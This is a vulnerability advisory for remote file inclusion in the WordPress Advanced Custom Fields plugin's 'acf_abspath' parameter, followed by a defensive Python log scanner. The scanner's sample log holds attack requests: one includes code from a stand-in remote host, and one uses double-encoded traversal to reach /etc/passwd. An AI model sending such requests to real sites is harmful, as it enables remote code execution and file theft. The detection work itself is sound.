Advanced Custom Fields Plugin for WordPress 'acf_abspath' Parameter Remote File Inclusion
Severity: High
Nessus Plugin ID: 63326

Synopsis
The remote web server contains a PHP application that is affected by a remote file inclusion vulnerability.

Description
The version of the Advanced Custom Fields plugin for WordPress installed on the remote host fails to properly sanitize user-supplied input to the 'acf_abspath' parameter of its 'core/actions/export.php' script. A remote, unauthenticated attacker can exploit this issue to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly loaded from a third-party host.

Solution
Upgrade to Advanced Custom Fields version 3.5.2 or later.
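As an added example (not part of the Nessus plugin or of the Advanced Custom Fields project), the script below shows how a defender could check web-server access logs for requests that exercise the unsanitized 'acf_abspath' parameter of 'core/actions/export.php'. It assumes Apache/nginx combined log format and flags any value for that parameter that carries a URL scheme or directory traversal, since a legitimate installation path has neither; the plugin path prefix and the log lines are constructed for illustration.

```python
"""Flag probable file-inclusion attempts against the ACF 'acf_abspath'
parameter in combined-format access logs (constructed example)."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined log format: client ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Script and parameter named in the advisory
VULN_SCRIPT = "core/actions/export.php"
VULN_PARAM = "acf_abspath"

# A trusted filesystem path never starts with a URL scheme (http://, php://, ...)
# and never contains '../' traversal or a NUL byte.
SUSPICIOUS_VALUE_RE = re.compile(
    r'^[a-z][a-z0-9+.-]*://|\.\./|\.\.\\|\x00', re.IGNORECASE
)


def suspicious_acf_abspath(target):
    """Return the decoded suspicious acf_abspath value of a request target,
    or None when the request is not to export.php or the value looks benign."""
    parts = urlsplit(target)
    if not parts.path.endswith(VULN_SCRIPT):
        return None
    # parse_qs already percent-decodes once; decode a second time so that
    # double-encoded values (%252e%252e%252f) are still recognised.
    for value in parse_qs(parts.query, keep_blank_values=True).get(VULN_PARAM, []):
        decoded = unquote(value)
        if SUSPICIOUS_VALUE_RE.search(decoded):
            return decoded
    return None


def scan_log(lines):
    """Return (client, time, status, value) for every line that looks like
    an inclusion attempt; malformed lines are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        value = suspicious_acf_abspath(m.group("target"))
        if value is not None:
            hits.append((m.group("client"), m.group("time"), m.group("status"), value))
    return hits


# Constructed sample log lines (plugin path prefix is an assumption)
PLUGIN = "/wp-content/plugins/advanced-custom-fields/" + VULN_SCRIPT
SAMPLE_LOG = [
    # benign: local install path passed by the plugin's own export page
    f'203.0.113.5 - - [10/Dec/2012:10:00:01 +0000] "GET {PLUGIN}?acf_abspath=/var/www/html/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # remote URL in the parameter: include from a third-party host
    f'198.51.100.23 - - [10/Dec/2012:10:00:07 +0000] "GET {PLUGIN}?acf_abspath=http://198.51.100.9/ HTTP/1.1" 200 2048 "-" "curl/7.26.0"',
    # double-encoded traversal: reads a local file
    f'198.51.100.23 - - [10/Dec/2012:10:00:09 +0000] "GET {PLUGIN}?acf_abspath=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1337 "-" "curl/7.26.0"',
    # different script with a URL-valued parameter: not this issue
    '203.0.113.9 - - [10/Dec/2012:10:01:00 +0000] "GET /wp-login.php?redirect_to=http://example.com/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    # malformed line, skipped
    'garbage line that does not parse',
]


if __name__ == "__main__":
    for client, when, status, value in scan_log(SAMPLE_LOG):
        print(f"{when} {client} status={status} acf_abspath={value!r}")
```

Run it as a script to list the flagged requests, or import `scan_log` and feed it `open("access.log")`. Because the check runs on the decoded value rather than the raw query string, it also catches percent- and double-encoded forms that a naive `grep "acf_abspath=http"` would miss; pair it with the upgrade to 3.5.2 or later, since detection does not remove the inclusion.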